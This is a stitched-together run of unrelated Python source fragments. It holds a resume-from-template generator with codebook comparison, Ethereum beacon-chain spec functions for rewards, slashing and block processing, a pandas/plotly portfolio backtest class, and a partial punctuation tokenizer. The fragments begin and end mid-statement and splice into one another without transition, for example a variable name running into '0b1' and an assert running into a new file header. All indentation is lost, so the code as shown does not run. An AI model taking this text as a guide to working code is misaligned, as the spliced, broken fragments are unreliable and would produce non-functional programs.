retval = writeLeaf(inFile, tempFile, currentLine, myLabel, startString, endString, currentString, currentPlusIntervalString, makeCodeBook)
if (retval < 1):
return retval
lineNumber += retval
if logging: print("")
print("", file=tempFile)
if (myParent == ''): break # We've come to the end of the template...the top level section was a Leaf.
if "*end_" in myText and myLabel == '1': # We've come to the end of the template
break
theLine = inFile.readline()
lineNumber += 1
return 1, tempFile
def printCodebook(inFile, filename):
"""
Prints the codebook, if it does not exist or has changed.
"""
print("Checking whether codebook already exists.")
returnVal, tempFile = printCodebookToTempFile(inFile)
if returnVal < 0: return returnVal
#is this codebook the same as the latest one?
codebookPrefix = filename + "_codebook-"
prevCodebookNames = glob.glob(codebookPrefix + "*.xls")
saveCodebook = True
if (len(prevCodebookNames) == 0):
print("No previous codebook was found in the folder.")
else:
latestCodebookName = max(prevCodebookNames, key=os.path.getmtime)
success, latestCodebook, encoding = openInputFile(latestCodebookName)
if (not success):
print()
print("Warning, failed to compare previous codebook with new codebook! Saving new codebook even though it might have the same content.")
else:
saveCodebook = False
tempFile.flush()
tempFile.seek(0)
aLine = tempFile.readline()
while aLine:
if (aLine != latestCodebook.readline()):
saveCodebook = True
break
aLine = tempFile.readline()
if not saveCodebook:
#If the new set of leaf texts is exactly the same as before except missing lines at the end, the previous check won't find the difference. We must compare the other way so a shortened codebook is noticed.
tempFile.seek(0)
latestCodebook.seek(0)
aLine = latestCodebook.readline()
while aLine:
otherLine = tempFile.readline()
if (aLine != otherLine):
saveCodebook = True
break
aLine = latestCodebook.readline()
latestCodebook.close()
if saveCodebook:
print()
print("Warning! The template does not match the latest codebook file: " + latestCodebookName)
print("One (or both) of the template or the codebook have been modified.")
print("A new codebook file will be created for the files being generated now.")
input('Press return to continue')
if saveCodebook:
codebookNumber = 1
while True:
codebookFilename = codebookPrefix + str(codebookNumber) + ".xls"
if not os.path.isfile(codebookFilename):
break
codebookNumber += 1
print("Saving new codebook in a file named " + codebookFilename)
try:
codebookFile = open(codebookFilename, 'wt', encoding=globalOutputEncoding)
except IOError as e:
print()
print("Error creating codebook file named " + codebookFilename)
print(e)
return -52
tempFile.seek(0)
try:
shutil.copyfileobj(tempFile, codebookFile)
except UnicodeError as e:
print()
print("Error! Failed to copy the codebook into the file due to encoding issues.")
print(e)
return -66
tempFile.close()
codebookFile.close()
print("Done saving the codebook.")
print()
else:
print("The codebook for this template already exists in " + latestCodebookName)
return 1
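# Why the codebook comparison above is done in both directions: if the new
# codebook is a strict prefix of the old one, reading line-by-line from the new
# file alone never sees a mismatch. A tiny illustration with in-memory line lists
# (assumed data, not the real codebook format):
def _files_differ(new_lines, old_lines):
    # Pad the shorter side with a sentinel so a length difference is detected.
    from itertools import zip_longest
    return any(a != b for a, b in zip_longest(new_lines, old_lines))
# _files_differ(['a', 'b'], ['a', 'b', 'c']) -> True, even though every line of
# the new file matches the corresponding old line.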
def createResumes(filename):
"""
Creates resumes from the template filename.
"""
success, inFile, encoding = openInputFile(filename)
if (not success):
print()
print("Error! Failed to open the template file!")
return -67
global globalInputEncodings
globalInputEncodings = [(filename, encoding)]
matchedPair = False
guiVersion = inFile.readline()
guiVersion_text = " ".join(guiVersion.split(" ")[1:4])
if (guiVersion_text.rstrip("\n") != "gui version number"):
print("Error! The file selected as a template " + filename + " does not have the correct text starting its first line: '" + str(Version) + " gui version number'")
print("Instead, the first line is '" + guiVersion + "'")
return -53
for line in inFile:
if ('*matchDifferent*' in line) or ('*matchSame*' in line) or ('*matchOnlyOneEver*' in line) or ('*matchMaxSelectionsPerSubPoint*' in line):
matchedPair = True
break
numDifferent = 1
if matchedPair:
while True:
try: numDifferent = int(input('This template file contains random sections for Matched "pairs". How many files should be matched in each batch? (0 to cancel) '))
except ValueError:
print("Please enter a positive integer.")
continue
if numDifferent < 1:
print("Canceled")
return -1
break
while True:
try:
if matchedPair:
numToMake = int(input('How many batches of matched resumes should be generated? (0 to cancel) '))
else:
numToMake = int(input('How many resumes should be generated? (0 to cancel) '))
break
except ValueError:
print("Please enter an integer.")
continue
if (numToMake < 1):
print("Canceled")
return -1
print()
myTime = ""
withTime = input('Would you like the date & time in each resume filename? (Y/n, anything else to cancel) ')
if (not withTime) or (withTime.lower() == 'y') or (withTime.lower() == 'yes'):
myTime = strftime("_%Y-%m-%d-%H-%M-%S")
elif (withTime.lower() != 'n') and (withTime.lower() != 'no'):
print("Canceled")
return -1
print()
inFile.seek(0)
inFile_strings = inFile.readlines()
replaced_fragments = 1
num_fragments = -1
have_printed_warning
0b1
matching_target_attestations = get_matching_target_attestations(state, current_epoch) # Current epoch
if get_attesting_balance(state, matching_target_attestations) * 3 >= get_total_active_balance(state) * 2:
state.current_justified_checkpoint = Checkpoint(epoch=current_epoch,
root=get_block_root(state, current_epoch))
state.justification_bits[0] = 0b1
# Process finalizations
bits = state.justification_bits
# The 2nd/3rd/4th most recent epochs are justified, the 2nd using the 4th as source
if all(bits[1:4]) and old_previous_justified_checkpoint.epoch + 3 == current_epoch:
state.finalized_checkpoint = old_previous_justified_checkpoint
# The 2nd/3rd most recent epochs are justified, the 2nd using the 3rd as source
if all(bits[1:3]) and old_previous_justified_checkpoint.epoch + 2 == current_epoch:
state.finalized_checkpoint = old_previous_justified_checkpoint
# The 1st/2nd/3rd most recent epochs are justified, the 1st using the 3rd as source
if all(bits[0:3]) and old_current_justified_checkpoint.epoch + 2 == current_epoch:
state.finalized_checkpoint = old_current_justified_checkpoint
# The 1st/2nd most recent epochs are justified, the 1st using the 2nd as source
if all(bits[0:2]) and old_current_justified_checkpoint.epoch + 1 == current_epoch:
state.finalized_checkpoint = old_current_justified_checkpoint
def get_base_reward(state: BeaconState, index: ValidatorIndex) -> Gwei:
total_balance = get_total_active_balance(state)
effective_balance = state.validators[index].effective_balance
return Gwei(effective_balance * BASE_REWARD_FACTOR // integer_squareroot(total_balance) // BASE_REWARDS_PER_EPOCH)
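# An illustrative calculation of get_base_reward with assumed Phase 0 mainnet
# constants (BASE_REWARD_FACTOR = 64, BASE_REWARDS_PER_EPOCH = 4) and example
# balances in Gwei; this is a standalone sketch, not part of the spec.
def _example_base_reward():
    BASE_REWARD_FACTOR = 64
    BASE_REWARDS_PER_EPOCH = 4
    effective_balance = 32 * 10**9         # 32 ETH in Gwei
    total_balance = 10**6 * 32 * 10**9     # one million 32 ETH validators
    isqrt = int(total_balance ** 0.5)      # stand-in for integer_squareroot
    return effective_balance * BASE_REWARD_FACTOR // isqrt // BASE_REWARDS_PER_EPOCH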
def get_proposer_reward(state: BeaconState, attesting_index: ValidatorIndex) -> Gwei:
return Gwei(get_base_reward(state, attesting_index) // PROPOSER_REWARD_QUOTIENT)
def get_finality_delay(state: BeaconState) -> uint64:
return get_previous_epoch(state) - state.finalized_checkpoint.epoch
def is_in_inactivity_leak(state: BeaconState) -> bool:
return get_finality_delay(state) > MIN_EPOCHS_TO_INACTIVITY_PENALTY
def get_eligible_validator_indices(state: BeaconState) -> Sequence[ValidatorIndex]:
previous_epoch = get_previous_epoch(state)
return [
ValidatorIndex(index) for index, v in enumerate(state.validators)
if is_active_validator(v, previous_epoch) or (v.slashed and previous_epoch + 1 < v.withdrawable_epoch)
]
def get_attestation_component_deltas(state: BeaconState,
attestations: Sequence[PendingAttestation]
) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Helper with shared logic for use by get source, target, and head deltas functions
"""
rewards = [Gwei(0)] * len(state.validators)
penalties = [Gwei(0)] * len(state.validators)
total_balance = get_total_active_balance(state)
unslashed_attesting_indices = get_unslashed_attesting_indices(state, attestations)
attesting_balance = get_total_balance(state, unslashed_attesting_indices)
for index in get_eligible_validator_indices(state):
if index in unslashed_attesting_indices:
increment = EFFECTIVE_BALANCE_INCREMENT # Factored out from balance totals to avoid uint64 overflow
if is_in_inactivity_leak(state):
# Since full base reward will be canceled out by inactivity penalty deltas,
# optimal participation receives full base reward compensation here.
rewards[index] += get_base_reward(state, index)
else:
reward_numerator = get_base_reward(state, index) * (attesting_balance // increment)
rewards[index] += reward_numerator // (total_balance // increment)
else:
penalties[index] += get_base_reward(state, index)
return rewards, penalties
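# Why the balances above are divided by EFFECTIVE_BALANCE_INCREMENT before the
# multiplication: a base reward times a raw Gwei balance can exceed 2**64, while
# a base reward times the balance expressed in whole increments cannot.
# Illustrative numbers only (EFFECTIVE_BALANCE_INCREMENT assumed to be 10**9 Gwei,
# as on mainnet).
def _example_increment_factoring():
    EFFECTIVE_BALANCE_INCREMENT = 10**9
    base_reward = 20_000                    # Gwei, example value
    attesting_balance = 3 * 10**16          # Gwei, ~30M ETH attesting
    total_balance = 32 * 10**15             # Gwei, ~32M ETH active
    naive = base_reward * attesting_balance # 6e20: would overflow a uint64
    factored = base_reward * (attesting_balance // EFFECTIVE_BALANCE_INCREMENT)
    reward = factored // (total_balance // EFFECTIVE_BALANCE_INCREMENT)
    return naive > 2**64, reward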
def get_source_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attester micro-rewards/penalties for source-vote for each validator.
"""
matching_source_attestations = get_matching_source_attestations(state, get_previous_epoch(state))
return get_attestation_component_deltas(state, matching_source_attestations)
def get_target_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attester micro-rewards/penalties for target-vote for each validator.
"""
matching_target_attestations = get_matching_target_attestations(state, get_previous_epoch(state))
return get_attestation_component_deltas(state, matching_target_attestations)
def get_head_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attester micro-rewards/penalties for head-vote for each validator.
"""
matching_head_attestations = get_matching_head_attestations(state, get_previous_epoch(state))
return get_attestation_component_deltas(state, matching_head_attestations)
def get_inclusion_delay_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return proposer and inclusion delay micro-rewards/penalties for each validator.
"""
rewards = [Gwei(0) for _ in range(len(state.validators))]
matching_source_attestations = get_matching_source_attestations(state, get_previous_epoch(state))
for index in get_unslashed_attesting_indices(state, matching_source_attestations):
attestation = min([
a for a in matching_source_attestations
if index in get_attesting_indices(state, a.data, a.aggregation_bits)
], key=lambda a: a.inclusion_delay)
rewards[attestation.proposer_index] += get_proposer_reward(state, index)
max_attester_reward = get_base_reward(state, index) - get_proposer_reward(state, index)
rewards[index] += Gwei(max_attester_reward // attestation.inclusion_delay)
# No penalties associated with inclusion delay
penalties = [Gwei(0) for _ in range(len(state.validators))]
return rewards, penalties
def get_inactivity_penalty_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return inactivity reward/penalty deltas for each validator.
"""
penalties = [Gwei(0) for _ in range(len(state.validators))]
if is_in_inactivity_leak(state):
matching_target_attestations = get_matching_target_attestations(state, get_previous_epoch(state))
matching_target_attesting_indices = get_unslashed_attesting_indices(state, matching_target_attestations)
for index in get_eligible_validator_indices(state):
# If validator is performing optimally this cancels all rewards for a neutral balance
base_reward = get_base_reward(state, index)
penalties[index] += Gwei(BASE_REWARDS_PER_EPOCH * base_reward - get_proposer_reward(state, index))
if index not in matching_target_attesting_indices:
effective_balance = state.validators[index].effective_balance
penalties[index] += Gwei(effective_balance * get_finality_delay(state) // INACTIVITY_PENALTY_QUOTIENT)
# No rewards associated with inactivity penalties
rewards = [Gwei(0) for _ in range(len(state.validators))]
return rewards, penalties
def get_attestation_deltas(state: BeaconState) -> Tuple[Sequence[Gwei], Sequence[Gwei]]:
"""
Return attestation reward/penalty deltas for each validator.
"""
source_rewards, source_penalties = get_source_deltas(state)
target_rewards, target_penalties = get_target_deltas(state)
head_rewards, head_penalties = get_head_deltas(state)
inclusion_delay_rewards, _ = get_inclusion_delay_deltas(state)
_, inactivity_penalties = get_inactivity_penalty_deltas(state)
rewards = [
source_rewards[i] + target_rewards[i] + head_rewards[i] + inclusion_delay_rewards[i]
for i in range(len(state.validators))
]
penalties = [
source_penalties[i] + target_penalties[i] + head_penalties[i] + inactivity_penalties[i]
for i in range(len(state.validators))
]
return rewards, penalties
def process_rewards_and_penalties(state: BeaconState) -> None:
if get_current_epoch(state) == GENESIS_EPOCH:
return
rewards, penalties = get_attestation_deltas(state)
for index in range(len(state.validators)):
increase_balance(state, ValidatorIndex(index), rewards[index])
decrease_balance(state, ValidatorIndex(index), penalties[index])
def process_registry_updates(state: BeaconState) -> None:
# Process activation eligibility and ejections
for index, validator in enumerate(state.validators):
if is_eligible_for_activation_queue(validator):
validator.activation_eligibility_epoch = get_current_epoch(state) + 1
if is_active_validator(validator, get_current_epoch(state)) and validator.effective_balance <= EJECTION_BALANCE:
initiate_validator_exit(state, ValidatorIndex(index))
# Queue validators eligible for activation and not yet dequeued for activation
activation_queue = sorted([
index for index, validator in enumerate(state.validators)
if is_eligible_for_activation(state, validator)
# Order by the sequence of activation_eligibility_epoch setting and then index
], key=lambda index: (state.validators[index].activation_eligibility_epoch, index))
# Dequeued validators for activation up to churn limit
for index in activation_queue[:get_validator_churn_limit(state)]:
validator = state.validators[index]
validator.activation_epoch = compute_activation_exit_epoch(get_current_epoch(state))
def process_slashings(state: BeaconState) -> None:
epoch = get_current_epoch(state)
total_balance = get_total_active_balance(state)
for index, validator in enumerate(state.validators):
if validator.slashed and epoch + EPOCHS_PER_SLASHINGS_VECTOR // 2 == validator.withdrawable_epoch:
increment = EFFECTIVE_BALANCE_INCREMENT # Factored out from penalty numerator to avoid uint64 overflow
penalty_numerator = validator.effective_balance // increment * min(sum(state.slashings) * 3, total_balance)
penalty = penalty_numerator // total_balance * increment
decrease_balance(state, ValidatorIndex(index), penalty)
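# An illustrative run of the proportional slashing penalty above, with assumed
# example balances in Gwei and EFFECTIVE_BALANCE_INCREMENT = 10**9 as on mainnet;
# the penalty scales with three times the fraction of total stake slashed in the
# window, capped at the validator's full effective balance. Standalone sketch,
# not spec code.
def _example_slashing_penalty():
    increment = 10**9                       # EFFECTIVE_BALANCE_INCREMENT (assumed)
    effective_balance = 32 * 10**9          # the slashed validator, 32 ETH
    total_balance = 10**6 * 32 * 10**9      # ~1M active validators
    slashed_sum = 100_000 * 32 * 10**9      # ~10% of stake slashed in the window
    penalty_numerator = effective_balance // increment * min(slashed_sum * 3, total_balance)
    return penalty_numerator // total_balance * increment
    # -> 9 * 10**9 Gwei, i.e. roughly 3 x 10% of a 32 ETH balance after truncation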
def process_final_updates(state: BeaconState) -> None:
current_epoch = get_current_epoch(state)
next_epoch = Epoch(current_epoch + 1)
# Reset eth1 data votes
if next_epoch % EPOCHS_PER_ETH1_VOTING_PERIOD == 0:
state.eth1_data_votes = []
# Update effective balances with hysteresis
for index, validator in enumerate(state.validators):
balance = state.balances[index]
HYSTERESIS_INCREMENT = EFFECTIVE_BALANCE_INCREMENT // HYSTERESIS_QUOTIENT
DOWNWARD_THRESHOLD = HYSTERESIS_INCREMENT * HYSTERESIS_DOWNWARD_MULTIPLIER
UPWARD_THRESHOLD = HYSTERESIS_INCREMENT * HYSTERESIS_UPWARD_MULTIPLIER
if (
balance + DOWNWARD_THRESHOLD < validator.effective_balance
or validator.effective_balance + UPWARD_THRESHOLD < balance
):
validator.effective_balance = min(balance - balance % EFFECTIVE_BALANCE_INCREMENT, MAX_EFFECTIVE_BALANCE)
# Reset slashings
state.slashings[next_epoch % EPOCHS_PER_SLASHINGS_VECTOR] = Gwei(0)
# Set randao mix
state.randao_mixes[next_epoch % EPOCHS_PER_HISTORICAL_VECTOR] = get_randao_mix(state, current_epoch)
# Set historical root accumulator
if next_epoch % (SLOTS_PER_HISTORICAL_ROOT // SLOTS_PER_EPOCH) == 0:
historical_batch = HistoricalBatch(block_roots=state.block_roots, state_roots=state.state_roots)
state.historical_roots.append(hash_tree_root(historical_batch))
# Rotate current/previous epoch attestations
state.previous_epoch_attestations = state.current_epoch_attestations
state.current_epoch_attestations = []
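# A worked example of the effective-balance hysteresis above, using assumed
# mainnet constants (EFFECTIVE_BALANCE_INCREMENT = 10**9, HYSTERESIS_QUOTIENT = 4,
# downward/upward multipliers 1 and 5); standalone illustration, not spec code.
def _example_hysteresis(balance, effective_balance):
    EFFECTIVE_BALANCE_INCREMENT = 10**9
    MAX_EFFECTIVE_BALANCE = 32 * 10**9
    HYSTERESIS_INCREMENT = EFFECTIVE_BALANCE_INCREMENT // 4
    DOWNWARD_THRESHOLD = HYSTERESIS_INCREMENT * 1
    UPWARD_THRESHOLD = HYSTERESIS_INCREMENT * 5
    if (balance + DOWNWARD_THRESHOLD < effective_balance
            or effective_balance + UPWARD_THRESHOLD < balance):
        effective_balance = min(balance - balance % EFFECTIVE_BALANCE_INCREMENT,
                                MAX_EFFECTIVE_BALANCE)
    return effective_balance
# _example_hysteresis(31_800_000_000, 32_000_000_000) -> 32_000_000_000 (inside the band)
# _example_hysteresis(31_700_000_000, 32_000_000_000) -> 31_000_000_000 (drops a whole increment)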
def process_block(state: BeaconState, block: BeaconBlock) -> None:
process_block_header(state, block)
process_randao(state, block.body)
process_eth1_data(state, block.body)
process_operations(state, block.body)
def process_block_header(state: BeaconState, block: BeaconBlock) -> None:
# Verify that the slots match
assert block.slot == state.slot
# Verify that the block is newer than latest block header
assert block.slot > state.latest_block_header.slot
# Verify that proposer index is the correct index
assert block.proposer_index == get_beacon_proposer_index(state)
# Verify that the parent matches
assert block.parent_root == hash_tree_root(state.latest_block_header)
# Cache current block as the new latest block
state.latest_block_header = BeaconBlockHeader(
slot=block.slot,
proposer_index=block.proposer_index,
parent_root=block.parent_root,
state_root=Bytes32(), # Overwritten in the next process_slot call
body_root=hash_tree_root(block.body),
)
# Verify proposer is not slashed
proposer = state.validators[block.proposer_index]
assert not proposer.slashed
def process_randao(state: BeaconState, body: BeaconBlockBody) -> None:
epoch = get_current_epoch(state)
# Verify RANDAO reveal
proposer = state.validators[get_beacon_proposer_index(state)]
signing_root = compute_signing_root(epoch, get_domain(state, DOMAIN_RANDAO))
assert bls.Verify(proposer.pubkey, signing_root, body.randao_reveal)
# Mix in RANDAO reveal
mix = xor(get_randao_mix(state, epoch), hash(body.randao_reveal))
state.randao_mixes[epoch % EPOCHS_PER_HISTORICAL_VECTOR] = mix
def process_eth1_data(state: BeaconState, body: BeaconBlockBody) -> None:
state.eth1_data_votes.append(body.eth1_data)
if state.eth1_data_votes.count(body.eth1_data) * 2 > EPOCHS_PER_ETH1_VOTING_PERIOD * SLOTS_PER_EPOCH:
state.eth1_data = body.eth1_data
def process_operations(state: BeaconState, body: BeaconBlockBody) -> None:
# Verify that outstanding deposits are processed up to the maximum number of deposits
# assert len(body.deposits) == min(MAX_DEPOSITS, state.eth1_data.deposit_count - state.eth1_deposit_index)
def for_ops(operations: Sequence[Any], fn: Callable[[BeaconState, Any], None]) -> None:
for operation in operations:
fn(state, operation)
for_ops(body.proposer_slashings, process_proposer_slashing)
for_ops(body.attester_slashings, process_attester_slashing)
for_ops(body.attestations, process_attestation)
for_ops(body.deposits, process_deposit)
for_ops(body.voluntary_exits, process_voluntary_exit)
def process_proposer_slashing(state: BeaconState, proposer_slashing: ProposerSlashing) -> None:
header_1 = proposer_slashing.signed_header_1.message
header_2 = proposer_slashing.signed_header_2.message
# Verify header slots match
assert header_1.slot == header_2.slot
# Verify header proposer indices match
assert header_1.proposer_index == header_2.proposer_index
# Verify the headers are different
assert header_1 != header_2
# Verify the proposer is slashable
proposer = state.validators[header_1.proposer_index]
assert is_slashable_validator(proposer, get_current_epoch(state))
# Verify signatures
for signed_header in (proposer_slashing.signed_header_1, proposer_slashing.signed_header_2):
domain = get_domain(state, DOMAIN_BEACON_PROPOSER, compute_epoch_at_slot(signed_header.message.slot))
signing_root = compute_signing_root(signed_header.message, domain)
assert bls.Verify(proposer.pubkey, signing_root, signed_header.signature)
slash_validator(state, header_1.proposer_index)
def process_attester_slashing(state: BeaconState, attester_slashing: AttesterSlashing) -> None:
attestation_1 = attester_slashing.attestation_1
attestation_2 = attester_slashing.attestation_2
assert is_slashable_attestation_data(attestation_1.data, attestation_2.data)
assert is_valid_indexed_attestation(state, attestation_1)
assert is_valid_indexed_attestation(state, attestation_2)
slashed_any = False
indices = set(attestation_1.attesting_indices).intersection(attestation_2.attesting_indices)
for index in sorted(indices):
if is_slashable_validator(state.validators[index], get_current_epoch(state)):
slash_validator(state, index)
slashed_any = True
assert slashed_any
def process_attestation(state: BeaconState, attestation: Attestation) -> None:
data = attestation.data
assert data.index < get_committee_count_at_slot(state, data.slot)
assert data.target.epoch
# -*- coding: utf-8 -*-
"""
TopGun Backtest Class
@author: David
"""
# %% IMPORTs CELL
# Default Imports
import numpy as np
import pandas as pd
# Plotly for charting
import plotly.express as px
import plotly.graph_objs as go
import plotly.io as pio
# %% CLASS MODULE
class BacktestAnalytics(object):
""" Backtest Analytics & Reporting for Timeseries Data
Here we take one or more portfolios (strategies) timeseries returns and
run various tests vs. against a specified becnhmark timeseries. There is
an option to provide multiple benchmark returns in the bmkrtns dataframe;
at the moment only one benchmark is used as a direct comparitor but those
other indices will be used as part of a correlation analysis.
NB/ THIS DOES NOT MANAGE STOCK LEVEL ANALYSIS - ONLY TIMESERIES
INPUTS:
portrtns: pd.DataFrame (or pd.Series) of timeseries returns or prices;
if using prices must add ports_as_rtns=False
bmkrtns: same conditions as portrtns (& using bmks_as_rtns)
benchmark (OPTIONAL): str() as column name in bmkrtns dataframe. If
not provided, a vector of zeros is used as the benchmark returns
eom: True(default)|False will converts all input dates to end-of-month
freq: 12(default) is the periods per annum. Currently only works monthly
MAIN FUNCTIONS:
run_backtest():
* builds data from portrtns, bmkrtns & benchmark
* creates full period summary table
* builds and stores rolling vol, TE, IR, etc..
* builds & saves drawdown series and analyses individual drawdowns
* creates wider correlation matrix inc. xs_rtns
plot_master():
* creates dictionary of useful plots
pretty_panda():
* applies basic styling to a pandas table - this could move
* bespoke sub funcs extend this; these funcs start "pretty_panda_xxx"
REPORTING:
In all cases we produce a templated markdown script with Plotly plots
already embedded as HTML - these can be fed to report_writer or anything
which turns markdown to a static html/pdf.
- markdown_doc() is primary function for generating markdown. REQUIRES
plot_master() to have been run but will prettify dataframe itself.
DEVELOPMENT:
- dynamic plots for correlation wrt time
- more work on hit-rates
- PCA based analysis
- basic checking that input benchmarks or Rf are in bmkrtns columns
Author: <NAME>
"""
def __init__(self, portrtns, bmkrtns,
benchmark=None, Rf=None,
eom = True, freq=12,
ports_as_rtns=True, bmks_as_rtns=True):
# ingest portfolio (strategy) and benchmark returns
# check if supplied data is as returns or prices
# if prices convert to returns
self.portrtns = portrtns if ports_as_rtns else portrtns.pct_change()
self.bmkrtns = bmkrtns if bmks_as_rtns else bmkrtns.pct_change()
# convert to end-of-month dates if required
# if we do this at the initialisation stage we know all else is eom
if eom:
self.portrtns = self._eom(self.portrtns)
self.bmkrtns = self._eom(self.bmkrtns)
# Name of benchmark - should match column name in bmkrtns
# Similarly the "Risk-Free" component if being provided
self.Rb = benchmark
self.Rf = Rf
# Other options
self.freq = freq # Assume 12 for monthly
# Other setup things
self.rolling = dict() # blank dictionary for rolling window frames
# Plotly template
colourmap = ['black', 'teal', 'purple', 'grey', 'deeppink', 'skyblue', 'lime', 'green','darkorange', 'gold', 'navy', 'darkred',]
fig = go.Figure(layout=dict(
font={'family':'Garamond', 'size':14},
plot_bgcolor= 'white',
colorway=colourmap,
showlegend=True,
legend={'orientation':'v'},
margin = {'l':75, 'r':50, 'b':25, 't':50},
xaxis= {'anchor': 'y1', 'title': '', 'hoverformat':'.1f', 'tickformat':'.0f',
'showline':True, 'linecolor': 'gray',
'zeroline':True, 'zerolinewidth':1 , 'zerolinecolor':'whitesmoke',
'showgrid': True, 'gridcolor': 'whitesmoke',
},
yaxis= {'anchor': 'x1', 'title': '', 'hoverformat':'.1f', 'tickformat':'.0f',
'showline':True, 'linecolor':'gray',
'zeroline':True, 'zerolinewidth':1 , 'zerolinecolor':'whitesmoke',
'showgrid': True, 'gridcolor': 'whitesmoke'
},
updatemenus= [dict(type='buttons',
active=-1, showactive = True,
direction='down',
y=0.5, x=1.1,
pad = {'l':0, 'r':0, 't':0, 'b':0},
buttons=[])],
annotations=[],))
# Save template
pio.templates['multi_strat'] = pio.to_templated(fig).layout.template
return
# %% CLASS PROPERTIES
# Portfolio or Strategy Returns - should be a pd.DataFrame
@property
def portrtns(self): return self.__portrtns
@portrtns.getter
def portrtns(self): return self.__portrtns
@portrtns.setter
def portrtns(self, x):
if isinstance(x, pd.Series):
self.__portrtns = x.to_frame()
elif isinstance(x, pd.DataFrame):
self.__portrtns = x
else:
raise ValueError('portrtns must be a pandas df or series: {} given'
.format(type(x)))
# Benchmark Returns - should be a pd.DataFrame
@property
def bmkrtns(self): return self.__bmkrtns
@bmkrtns.getter
def bmkrtns(self): return self.__bmkrtns
@bmkrtns.setter
def bmkrtns(self, x):
if isinstance(x, pd.Series):
self.__bmkrtns = x.to_frame()
elif isinstance(x, pd.DataFrame):
self.__bmkrtns = x
else:
raise ValueError('bmkrtns must be a pandas df or series: {} given'
.format(type(x)))
# %% BIG BANG
def big_bang(self, title=""):
""" End-to-End Control Function """
# Run Basic Backtest
self.run_backtest()
# Generate Plots
self.plot_master()
# Generate Markdown
md = self.markdown_doc(title=title)
self.md = md
return md
# %% HELPER FUNCTIONS
def _eom(self, x):
""" Trivial function to ensure End-of-Month Dates in Pandas """
x.index = x.index + pd.offsets.MonthEnd(0)
return x
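# Illustrative behaviour of the MonthEnd(0) offset used above:
# pd.Timestamp('2021-03-15') + pd.offsets.MonthEnd(0) -> Timestamp('2021-03-31')
# pd.Timestamp('2021-03-31') + pd.offsets.MonthEnd(0) -> Timestamp('2021-03-31'), i.e. unchanged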
# %% BASIC BACKTESTING
def run_backtest(self):
""" MAIN FUNCTION
Function will splice port returns with benchmark & Rf returns so we have
a common time history, then do a series of things:
- Cumulative Returns
- Excess Returns (to benchmark)
- Drawdown and Excess Drawdown
- Rolling 12m metrics
- Summary Table - Full Sample Period
- Summary Table - per_annum except most recent year which is YTD
- Build "wide" correlation matrix with port rtns, xs returns and
all benchmarks specified in self.bmkrtns
INPUTS: none required, but the following attributes must already have been set:
- self.portrtns
- self.bmkrtns
- self.benchmark
- self.Rf
"""
# Benchmark
# Pull from bmkrtns if index provided; set as vector of zeros otherwise
if self.Rb is None:
bmk = pd.Series(data=0, index=self.portrtns.index, name='BMK')
else:
bmk = self.bmkrtns.loc[:,self.Rb]
bmk.name = 'BMK'
# Risk Free Rate Stuff
# Pull from bmkrtns if index provided; set as vector of 0 otherwise
# Be careful about the alignment of dates (indices)
if self.Rf is None:
Rf = pd.Series(data=0, index=self.portrtns.index, name='Rf')
else:
Rf = self.bmkrtns.loc[:, self.Rf]
Rf.name = 'Rf'
# Consolidated dataframe for risk-free, benchmarks & returns
# Also set up cumulative returns
# Rf always at 0, Benchmark always at 1 in dataframe
self.rtns = pd.concat([Rf, bmk, self.portrtns], axis=1).dropna()
cr = (1 + self.rtns).cumprod() * 100 # cumulative returns
self.cum_rtn = cr
# Excess Returns
# Remember again Rb at 1
self.xsrtns = self.rtns.subtract(self.rtns.iloc[:, 1], axis='rows')
self.cum_xs_rtn = cr.subtract(cr.iloc[:,1], axis='rows') + 100
# drawdown analysis
self.drawdown = self.rtns2drawdown(alpha=False)
self.xs_drawdown = self.rtns2drawdown(alpha=True)
self.drawdown_table = self.drawdown_breakdown(alpha=False)
self.xs_drawdown_table = self.drawdown_breakdown(alpha=True)
# rolling period analysis
for t in [12]:
# 12m returns for data & risk free index
irtn = cr.pct_change(t)
# excess return taken by subtracting the benchmark
irtn_xs = irtn.subtract(irtn.iloc[:, 1], axis='rows')
# rolling volatility
iVol = self.rtns.rolling(window=t).std() * np.sqrt(self.freq)
# Ex-Post Tracking Error [std(Rp-Rb)]
iTE = self.xsrtns.rolling(t).std() * np.sqrt(self.freq)
# Sharpe Ratio [(Rp-Rf)/vol]
# Remember Rf at position 0
iSharpe = irtn.subtract(irtn.iloc[:, 0], axis='rows').divide(iVol, axis='rows')
# save ith data to dictionary
self.rolling[t] = dict(vol=iVol,
rtn=irtn,
xsrtn=irtn_xs,
te=iTE,
sharpe=iSharpe)
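# e.g. self.rolling[12]['sharpe'] then holds the rolling 12m Sharpe ratio
# frame; the other keys are 'vol', 'rtn', 'xsrtn' and 'te'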
# Run summary table & annualised summary and ingest
self.summary = self.backtest_summary()
self.summary_pa = self.per_annum()
# Extended Correlation Matrix
# Use BMK, PORT, PORT_XS_RTNS & the bmkrtns indices to form corr matrix
# Some minor adjustments to remove Rf from 1st column
rtns_wide = pd.concat([self.rtns.iloc[:,1:], self.xsrtns.iloc[:, 2:]], axis=1)
rtns_wide.columns = list(self.xsrtns.columns)[1:] + list(self.xsrtns.columns + '_XS')[2:]
rtns_wide = pd.concat([rtns_wide, self.bmkrtns], axis=1).dropna()
self.rtns_wide = rtns_wide
self.corr = rtns_wide.corr()
return
def rtns2drawdown(self, alpha=True):
""" Returns-to-Drawdown Timeseries
NB/ Rebased to 0 not 100
"""
# Need to select a method for drawdown
# if alpha is True use excess returns, otherwise returns
# Remove risk free column
rtns = self.xsrtns if alpha else self.rtns
rtns = rtns.iloc[:,1:]
dd = 1 + rtns # add 1 to monthly rtns
dd.iloc[0,:] = 100 # rebase to 100
# iterate through each time period
# create an index series with a max of 100
for i, d in enumerate(dd.index):
# ignore 0th because we need the i-1 time period
if i == 0:
continue
rest of word
parts = list(
filter(
None,
settings.begin_punctuations_pattern.split(word_text, maxsplit=1),
)
)
first_word = True
while word_text and (len(parts) == 2):
punct_text, word_text = parts
if first_word:
# Preserve leading whitespace
punct_text = first_ws + punct_text
first_word = False
punct_text_norm = settings.normalize_whitespace(punct_text)
has_punctuation = True
yield PunctuationWordNode, {
"text": punct_text_norm,
"text_with_ws": punct_text,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
